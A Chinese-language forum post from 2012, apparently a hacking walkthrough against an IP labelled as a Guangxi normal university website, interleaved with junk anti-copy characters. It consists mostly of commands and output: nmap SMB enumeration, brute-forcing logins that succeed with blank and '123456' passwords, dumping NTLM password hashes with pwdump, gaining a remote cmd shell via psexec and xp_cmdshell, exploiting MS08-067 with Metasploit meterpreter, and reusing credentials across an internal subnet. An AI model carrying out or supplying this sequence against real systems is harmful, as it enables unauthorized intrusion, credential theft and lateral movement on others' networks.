广西师范网站http://202.103.242.241/
7 ]5 ]1 Q0 |! v9 L4 N' k6 B0 g5 |/ @' O7 k) B# }
root@bt:~# nmap -sS -sV 202.103.242.241
/ K0 s; h6 O! V! F) p) x5 i
6 |1 x' P. J; @$ gStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST* ~! Z" u, X; F+ W E% e8 E8 E
' E% w5 ]1 Z" w7 V
Nmap scan report for bogon (202.103.242.241)
/ a& t1 m, |8 D1 i/ x
8 Y: \: A J! `1 R1 z) t6 s: PHost is up (0.00048s latency).
3 J; r' m( H9 f9 e8 v# L- f/ C- o R4 t6 D
Not shown: 993 closed ports
) m; P% s3 p. h, a" o$ Y+ d4 v
PORT STATE SERVICE VERSION# H* }) u6 [& k* A; x
# W9 A! y& U" @- q/ {135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
. b! j$ }! S2 X: \1 }, u
2 C; B1 J' [0 K( T. S139/tcp open netbios-ssn
& C# K% z) l6 `. j, B( q8 S
" D8 J/ R7 Q3 z P445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds6 t- J7 L! r" a* ?6 h$ R
1 a# [/ s9 D0 h1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
3 ?) N9 t) h- t5 H1 @# {' {* A7 `( i; G- k( J h$ ~( m
1026/tcp open msrpc Microsoft Windows RPC% U* A# q1 T2 ]- T0 X- p
$ k3 c( j' S7 U2 D& Q4 u8 R
3372/tcp open msdtc?- O4 `/ \: J6 u
* o5 q1 O, F" s3389/tcp open ms-term-serv?
1 E' ^9 S# E' ?3 `' \% ], U- l/ u$ `' Y0 s4 @1 ^+ o4 d
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
" X* n5 ~' t0 j- [+ ASF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r% j1 r: C: ?' U8 d: `* p, |" J' K, C
$ C% e, } v& z- k3 D G) {# M0 nSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
; l2 ~- e0 g- Q8 v
& H; u8 f& K0 A3 a3 s" }" Q, L9 `; Z! i3 RSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)8 u, l5 A# Y2 S0 U
, A& G& Y$ [' \' H# V5 R/ _SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
* g" O7 e/ ]$ V4 A- x: @5 \4 o/ R: {% k2 Z- X
SF:ptions,6,”hO\n\x000Z”);5 ?0 F4 i" {' x! G2 `% ]" G
9 r4 C: Q9 J7 @5 ^) ?8 n* @
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)) x& L0 ?- _- R6 U: N& i
4 E- q3 h* s- w2 ^! RService Info: OS: Windows6 s2 l' J9 J2 T* @
" q/ S( ]; ^/ ~. GService detection performed. Please report any incorrect results at http://nmap.org/submit/ .. Y1 i% l/ F, F6 X9 e0 p2 D, R. z
6 f, P; A6 M; B4 I. F, FNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
W; |7 f& y) P2 O! Q7 ~3 ]: T% h0 b8 E2 e
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
! R' k5 i, `* e% w1 _9 F5 G# q$ g# G- M( S/ M
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
# T/ F! C5 }+ ^% ^, U, F' f( v9 e$ @9 L- }+ g, u
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse' I7 {: J& P6 d7 d0 q
) c7 ^1 ^' C3 E3 d) ^8 C
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
, n0 t2 Q' q) m; r7 P& t6 F& T Y% R# ^" J
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse @( b1 M; n5 \: Y- X4 W
! s7 e, f1 Q( z& P6 v0 ?3 v) W-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
. N) G2 `: i2 e' b6 g! ]6 m$ U
' V" ?4 m$ ~, g# R+ t8 V! N; h-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
' ^% ^; E# A, }# g0 g# M4 z
- [) X% M9 b' o9 T7 }-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
7 _# \% R9 p/ c7 P- a
2 W- W* N! p; ~; s6 |1 o L-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse+ ?5 D7 I* k! L) p; ]- n2 E5 T& f2 M
8 l8 f5 O+ V2 c9 z0 `4 I4 D
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse3 n3 |5 w, x k, t3 I& O+ y
0 G/ y8 G! C w a-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
& G! H- e& x8 x" O3 t% b4 U, s: X: n( P5 X8 s' ^1 e) B
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
9 D) k9 H- Y- N$ ], T* F2 ?% u9 a* t* C$ A P! R
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse" p$ E4 n4 y; Y0 M# G; ?" t
) z1 f) h4 a( O6 F
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse( J8 ?8 ~( o1 Q
8 C- ^% m2 ~4 G. b6 l6 k- Q-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
2 z7 g" c5 c: t3 y: T( j
6 i2 H4 v& l4 Y-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse: `0 P6 q' | H' X; G: b
2 i* J: N R% H V( n& Kroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 4 ?1 I/ n R7 _! M5 B# D( j) o
! U% h* V ]' F# m$ H! q//此乃使用脚本扫描远程机器所存在的账户名
9 d# s% ~% z, o( y2 d
+ ?+ ^, Y0 g: NStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST8 T4 G( @- T! y6 Q* h* b
9 X* ^: n- \; G/ C d9 C- ]Nmap scan report for bogon (202.103.242.241)6 D$ m3 A1 |3 N: v
- O$ K4 _3 d9 a
Host is up (0.00038s latency).
, D) V" D: K7 W; `- A+ Q$ N7 P
) p# a" Y3 i" ^* [8 `3 vNot shown: 993 closed ports6 I A; h' r- \. f" Z
S" T/ K# C! ?
PORT STATE SERVICE+ J+ w3 t' Z/ ^5 t) e6 ? O
8 G, S, ^8 j6 P' _
135/tcp open msrpc
# g% \; }" @7 P5 Q% G1 U# c: v% A$ m6 |6 s# X/ w% [
139/tcp open netbios-ssn1 E3 k$ \* \1 o: V
% Y4 j, j# Q: d. R2 D
445/tcp open microsoft-ds
/ w) T5 r m# u: {/ o' O/ e3 p& \/ H8 `1 n6 y5 J3 M3 m
1025/tcp open NFS-or-IIS! ^- ]/ z1 o, \! D5 K$ e' f
: c& d# w9 Y+ @$ Y1026/tcp open LSA-or-nterm
8 s- C% g) e' n# [ t
5 x5 \ C; m) m2 s r r5 {3372/tcp open msdtc
( W5 ] @+ F( M1 S( U. k' y
* |8 T+ F; ?4 `2 M( f$ Y) G5 }3389/tcp open ms-term-serv' A+ I+ X: u' _1 d' k. g. Y
: [9 I9 S9 f7 y$ Q8 x, N8 wMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* z2 _! p5 @2 B. {2 b: m4 ?* M) \4 @- J" T4 Z9 n, E. k6 {; e) n
Host script results:1 v( L6 @6 ]; O& B$ _) G5 v
# \7 L0 T* j9 _/ G d- q s4 n* \, d
| smb-enum-users:1 T+ |! ?. U* |) h. b) C' [
( x8 c4 Z) P! y/ {3 Q& n& M; `
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
/ ~8 L5 y' u* G1 K2 t/ L% u0 k1 ^' K) l6 r! f
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds+ w# |0 v! f# f6 H- Q
( V1 {' k0 A, r% ?- k
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 1 j/ D4 J" L. K6 i
, H5 h9 R1 N- j//查看共享: \; d) m4 i4 }, ~( r) z1 B
( Q8 N; ?7 ?( a. p9 Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
+ z+ v! U, C, W- s! n1 @
1 q( {) g6 f8 k' r1 iNmap scan report for bogon (202.103.242.241)$ n5 B9 P8 y8 P" e/ ]4 b8 ]" o
* l4 E9 \7 l/ r) |0 H
Host is up (0.00035s latency).
# C9 M$ q- {) N" m% b, E, q" l: i( G4 O6 E. Z9 h& h# Z
Not shown: 993 closed ports
( j" k- {+ Z4 K7 M" H
; i" n) K) \( p7 ZPORT STATE SERVICE
& G6 g. e- s6 h8 y, d8 c& \3 D \8 o1 x
135/tcp open msrpc3 A: O9 i. \+ `# {3 L7 s7 K1 L) U
, r( V$ s h3 R, W: h
139/tcp open netbios-ssn! X/ ^" ~) Z! C, U& }
- h, K" } B2 v* f# T* x445/tcp open microsoft-ds5 _2 Z( O4 x4 Q0 S1 M& `
. E) v8 h+ I0 V$ X7 q
1025/tcp open NFS-or-IIS
; E! J0 k2 F& f; t# f
, U' H I- ]" H2 [6 W- n) r# g1026/tcp open LSA-or-nterm2 `- X- M {* g' G/ m
$ z, F( f9 n' @/ u) g' i9 _0 A3372/tcp open msdtc
9 x3 x) h, B; ^: ~1 A+ h7 C' n& q7 A! w4 ^, F
3389/tcp open ms-term-serv# \$ R% U; C; ?7 F. J9 [
& B6 P) {2 B7 D' [MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
% I: [$ b' q4 T5 j2 |! ~% {6 A: r1 B0 ?
Host script results:3 S# R, ?. `. E& ~* q: M8 q9 z. p7 p
% T* v0 m# a6 U. P$ p$ ~| smb-enum-shares:2 x3 d% |9 F, I% \4 ~
$ s" U. K% F, f) Q; X. j& ?| ADMIN$
# Y4 }5 M0 t. s2 }2 P# `4 A" b4 F( X# t
| Anonymous access: <none>5 c/ ]; X' R# F" x2 W( a
; e d7 f2 |2 F, i& v
| C$
' G2 C) I' | W |, ~+ H
2 ]$ `2 w$ b3 ^| Anonymous access: <none>$ g, t7 C# L: @7 u' J
3 }: b# Q0 r: ?* U| IPC$
! U+ G4 M& r& ~( ?/ g1 C9 z
8 A% l2 @) ^4 {2 ?" x* k|_ Anonymous access: READ
' n! Y: _3 i% e* W( C2 O
* j" ]* D/ Z' }Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds/ O2 x/ S r$ X( v6 V* K3 B9 M
1 x" V0 I7 [9 e. ^( y. sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 0 f" z6 U, W" N3 [3 W. Z
- O* H/ b. c7 S, ~' R
//获取用户密码
' M& Q% }" a. Z; b$ o5 u5 y: y Z E1 W0 i) y2 Q, i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
& Z8 Z8 \% {. M ]( N/ k4 f. U5 ]; e8 V* n7 n
Nmap scan report for bogon (202.103.242.2418)) e1 d" @% Q$ N0 W" p
6 j8 P. W. \5 k2 u1 LHost is up (0.00041s latency).
' e [6 I( c5 F, J% m1 K2 X+ `: I! T0 ?6 @' }2 c u
Not shown: 993 closed ports( n% d- ]0 a/ z8 I& q" s& t5 |+ I: @
; e- x: p' w6 R! y
PORT STATE SERVICE1 C6 \1 L# g* `, |6 W1 M& G$ {
1 D7 A: L% y2 }) U4 T135/tcp open msrpc# W& M5 w0 Z# S; P' S
3 a) s1 F' P6 N* q4 s0 | Z139/tcp open netbios-ssn% H4 Y2 [- I! T. X6 u
5 m7 e' w. Y+ J$ Q
445/tcp open microsoft-ds, v+ O8 E; V x, h* ?2 m9 y$ n& w1 D4 T
! V8 m" \9 r1 Z1 W1025/tcp open NFS-or-IIS( D! l d5 C* j, h$ V0 R
/ ~$ [+ R# a: N& @! T1026/tcp open LSA-or-nterm
o. V2 X& h6 d7 {4 N% o# ~" n" J
: Y) K' d$ e' v0 G. T- J2 M; {3372/tcp open msdtc0 P7 }! b) z+ ]9 U
( T8 o6 A! H* A& U' V/ Y
3389/tcp open ms-term-serv) y: b8 \ W/ r$ n# y
6 `8 n0 Z5 U6 \3 h
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ q4 \4 T/ o- ]( s- A$ @ e
& \, o! q9 k( z
Host script results:) ~8 \: J/ j3 C. x) H
; W2 |6 R" a2 t2 {% D8 q. S
| smb-brute:* n6 `* z' P5 J
. g' U2 N$ m& G' vadministrator:<blank> => Login was successful
% n( Z6 T+ Z9 g$ f" A6 Z) x2 f8 c' H- I- I$ Q7 g* f7 A+ }
|_ test:123456 => Login was successful
, Q: c/ h3 w0 \. j: C- |. {; [9 ]* \( j4 J$ ^( {; k
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds" K+ J: ?$ u& u6 d+ X3 |! K
- j3 N! x+ Z% P+ B5 A
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash: a0 g7 C3 M' y5 t5 g) c1 L+ `2 S4 \
) \8 T! j( {0 s: Hroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data8 v/ z4 \; r+ m& O; g* b3 _7 s5 V
" @, j$ {/ `2 z. r: H( U6 mroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
! D- m# |. p9 x! d9 H z) `: l# f6 P
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
* Z! z6 T5 N+ y5 @- G0 |8 P% A' ^5 D
$ T2 i; i& ]2 CStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST" ^% {( t( i6 Y
0 A6 z4 k* W$ C& F$ q- V; T$ T$ U+ Q
Nmap scan report for bogon (202.103.242.241)
+ j2 U e/ {- H; \: C0 N9 r T @1 n* ~' K0 o
Host is up (0.0012s latency).
$ P% X# l$ H. u+ K/ {, g6 s
& m2 `: Q: {) G% r6 S, l8 A5 J3 g( [, KPORT STATE SERVICE
& [) b6 S* C0 S- V c7 ?3 r
; s4 T. E! O0 I- [& \. H135/tcp open msrpc5 f) o3 z. [# U( d1 j. s
+ M0 ~1 g$ V1 H139/tcp open netbios-ssn1 s [$ s9 [7 o4 B7 V
/ u/ Q* f/ `; d5 C445/tcp open microsoft-ds4 m/ @- C/ A% T( X( X
& L( ~( o3 @- u) t" ^; V+ d+ V; o
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# x+ M2 W9 p" J/ @2 z' f3 T" ^, U' s' F) n
Host script results:
) F# ~( a4 L- \% X/ {; {8 H5 v* s& |; h7 g5 ?1 L6 w9 e
| smb-pwdump:
; ]: E/ [: Q. O& {' u; j, _6 \6 S% \8 J% w1 \4 T& O" e
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
% G/ [( r. e; j- q- k( i8 Y' q" B. g
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************' q' v" r6 ]5 b! o% i. t% X* ~
- C9 B3 h! h/ t7 I$ K: ^: e' J
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
* V+ g+ y( _- G$ d) a6 _
4 H9 _5 r3 k7 R, ]. z; a|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
& x+ Y5 ?2 q7 h/ ^ Q# N8 [; j6 p6 y K2 n
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds% Q- N( K8 L; G# }3 ?
; Z2 {4 s5 B8 t" x; y. x+ `3 eC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
( z6 J, ?2 {" S8 H5 w+ V6 H% m+ f& p1 t# V2 [2 \
-p 123456 -e cmd.exe
+ z+ d; u2 Y; G) s. J# }: N w! q$ O3 u4 i% @
PsExec v1.55 – Execute processes remotely
1 x/ B( T: o. a
% ^6 Q1 S5 X( p1 a3 g8 \Copyright (C) 2001-2004 Mark Russinovich
3 T6 e1 \1 l) |0 X5 X& {8 s- u" ^; u: R% J. w& m' j# b& x: Y
Sysinternals – www.sysinternals.com
, y9 N6 w- j5 g4 F8 [, e0 w/ \. ?; g% o4 J+ n3 J
Microsoft Windows 2000 [Version 5.00.2195]
0 ]! ^5 M9 C, \# p
& G1 ^& C# l& O$ O. a( P4 d, J(C) 版权所有 1985-2000 Microsoft Corp.
0 A0 b% [% z7 P! D+ M, @
- l6 H# ~7 a" \. p' o: E" }4 s' }C:\WINNT\system32>ipconfig
$ r$ |7 \# _8 o, o" l3 j- G, M( s7 b4 G8 H3 e' n! [8 w
Windows 2000 IP Configuration2 H8 W. i3 c) Z# A
7 |; d- `7 v( H! t F- D) }4 j7 X
Ethernet adapter 本地连接:
! {. W# G4 o0 U9 o7 Z- K$ E) |: r- h
) a3 f b, P$ s' L8 i7 i5 Q8 g% TConnection-specific DNS Suffix . :
$ P% G2 y9 m3 C7 v4 f: {
! D# Q% q! [) MIP Address. . . . . . . . . . . . : 202.103.242.241& P2 u) R- W% ~0 R, U, H, j
) ]. P# T8 M9 ?. H
Subnet Mask . . . . . . . . . . . : 255.255.255.0 E; l; c# G& @0 f/ ~' ?
5 B3 D8 W% M+ F
Default Gateway . . . . . . . . . : 202.103.1.12 i- Z4 o% E- |" J
0 ~" f" @6 ]$ l, e J3 \) Y2 n
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
, z. e/ a! }3 Q
; p# {1 m+ x; o6 aroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
0 S0 M+ k, Z" t( v" `5 A
# F8 D& ]: ~5 k" R: |6 v0 i- xStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
) d9 f0 q* y+ ^2 u' D# A4 b) F) a: R5 D) W+ E, A8 g
Nmap scan report for bogon (202.103.242.241)
& t' R' ?6 A7 V8 X+ l) G% D; S% g. o% [7 e8 `
Host is up (0.00046s latency).# f3 p4 ]0 N" E
, e4 t) f {* A9 L5 iNot shown: 993 closed ports$ x% m4 E1 \2 _! Q! L1 N; s' v
, H4 _+ |0 `0 y1 f8 N+ M9 u' SPORT STATE SERVICE
$ I0 f T' R, z4 T& C/ b, E E
) c- Y4 U1 L& N/ L q' E/ J/ q% V135/tcp open msrpc
1 q: z5 T% c& x3 D+ e3 k- @) O4 D
) s" s+ V1 |* {9 u/ T' f' A' a139/tcp open netbios-ssn
+ ?$ M8 ~: _$ l- _+ o8 P* a( z
, {/ k- n" F. t+ |5 o445/tcp open microsoft-ds
- L0 _" i( U/ ^3 l# e: Q2 |- J+ a
( {& s8 r% ~8 \% O# G1025/tcp open NFS-or-IIS
( B5 M! S J$ m5 l {9 ?& G3 M* h6 J+ k
1026/tcp open LSA-or-nterm
' n. T$ R0 B' S! y7 ]* c4 A6 f) k0 X- V" l; L' W
3372/tcp open msdtc6 u6 G; U- P+ K p( K+ u
. O# }/ J* {( \3389/tcp open ms-term-serv
- z& R! \* @* ]/ _ r6 o% O8 I* \9 Y0 F& D
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 t% T$ Y" L8 {: q9 |, ]. ^
* D4 s. u# ]' `0 _' G6 X
Host script results:
! [( q4 H0 M9 c4 y4 N" u0 \% R$ X- r- _9 R/ ]. y0 l, g
| smb-check-vulns:
7 f' I8 t8 `6 ^; e" S0 {4 \$ B- \* d: e% w
|_ MS08-067: VULNERABLE, G# y5 z1 {7 F4 x5 ?8 v6 Z$ i
9 L. u$ R, Q8 TNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
. o# D9 \* [) v/ v1 P
; p5 [7 a- [8 e, Y! Z* Broot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出. @% N# r& ^ ^
f3 s) \# ?" |/ q6 j; g$ N; Y
msf > search ms08
5 n( Z/ M. O$ L4 S/ W. R5 `! [* W+ C6 e7 ?& Z3 Y
msf > use exploit/windows/smb/ms08_067_netapi7 {' G' H$ f% s7 m
# m+ J; t6 _7 j) N; k" o
msf exploit(ms08_067_netapi) > show options
% R( [; r0 L$ Z. x/ d( Y: x: I, @+ Z4 ~8 Q% |7 |, ?
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
8 s+ i8 k- s: Y: u3 Z1 L ?& c6 q) @0 r$ E$ P- t
msf exploit(ms08_067_netapi) > show payloads
& F2 A3 y1 B2 L; j9 k3 V J
! @" f, B& L6 I$ I" M- imsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
) q9 ~ J& c% ]5 O% j( @- j( }) l' |
9 D+ ?4 B9 |/ P- vmsf exploit(ms08_067_netapi) > exploit
' \5 e. _+ j; h5 ?
4 j! _4 l( C2 H" z3 q ymeterpreter >
8 W) C: H. l" \( h0 l3 J1 N" w; q& P {) K
Background session 2? [y/N] (ctrl+z)
! ?% x7 M# p& V; w8 ~
- @% q% {) q# q( c, dmsf exploit(ms08_067_netapi) > sessions -l# B! ~ L6 n8 W' Q9 h8 G
( Y% b" i" t) M1 W
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt% x9 b' G0 B/ U! c6 c8 z) C
- y% w+ U/ i8 B1 M
test
" i2 H7 \3 X7 l6 n b
; G' Z+ @9 n+ t2 X) F* p1 i, Nadministrator6 ~4 X6 ~4 w! e: B
! H7 W0 d' }0 {* `) p6 x: ~' _8 h9 L
root@bt:/usr/local/share/nmap/scripts# vim password.txt
" X' W- a1 `8 M! [+ \
2 j' O. A7 d' v, x. @2 v44EFCE164AB921CAAAD3B435B51404EE- V' d% m4 L% ]) j
0 E3 R/ I( `/ Y8 C! d1 |9 qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
. n2 \% \- m' A, ~5 U/ ^
, v- Q; Q* y1 G! _+ a% w' } //利用用户名跟获取的hash尝试对整段内网进行登录
! f% v, S- W+ r0 C4 p1 C8 x) u" m* u" Q$ g) t% K
Nmap scan report for 192.168.1.105
% Y) K% { G7 X: e7 {6 l5 Z4 M& J& I- ^- Y/ h4 f) k% ]
Host is up (0.00088s latency).
9 W! w, u. y9 E$ M
9 C8 S' w& _6 s7 [8 iNot shown: 993 closed ports
5 W* [4 p1 K. p# k1 ?8 L: r) w- ~4 Q* O \" z3 r
PORT STATE SERVICE- e3 \1 \, ]3 ~3 f" e4 e: ~: w- v
7 X, n. k! e" m6 N9 h, ~+ J135/tcp open msrpc
8 j' U% a3 z1 S# Y6 p) Y
, r$ x B, e( b4 _9 o& d139/tcp open netbios-ssn$ p% r# K3 W6 {5 K+ V! k; {
0 S8 ~& `! ~2 D5 ?# ]7 ?' K/ }) f4 o445/tcp open microsoft-ds
0 m! @$ y1 B& Y) X8 o; {/ p- Q
/ U3 H) h2 O, C2 n2 C1025/tcp open NFS-or-IIS, Z- u$ k+ {* l5 @8 r3 ]- Q4 V
; U+ \# _9 q& J- f& y0 o* g1026/tcp open LSA-or-nterm
' `. j7 N4 _! f( M; D8 ^6 ~5 H0 o7 z6 Y' {
3372/tcp open msdtc
& J& b; K Y4 R S
. T% |) Q7 \5 S5 E# l3389/tcp open ms-term-serv
/ h5 f' y) o/ w% L' r: g
) ]3 {! j2 I. z$ _+ U) q$ ]MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 R# ]5 A/ X6 Z
0 t: a. [- F. w3 N0 j
Host script results:1 q- q0 l3 N& r x6 p$ Y' d2 x8 E
3 F4 r! F% ]8 a1 S/ U" Y# \| smb-brute:
2 f! g% P& a1 _4 h
* X; f# R, P# h* p! Z|_ administrator:<blank> => Login was successful
' \3 Y; y4 C# t7 D- v0 W
, y0 R+ }6 t( x$ ]; p攻击成功,一个简单的msf+nmap攻击~~·
, ^% e( a9 v. h) R6 B7 g, ]5 ~ Z5 R" O3 u) r- h6 C$ ]% f* s |" H7 \; _) S
|
发表于 2012-12-4 12:46:42
收藏
支持
反对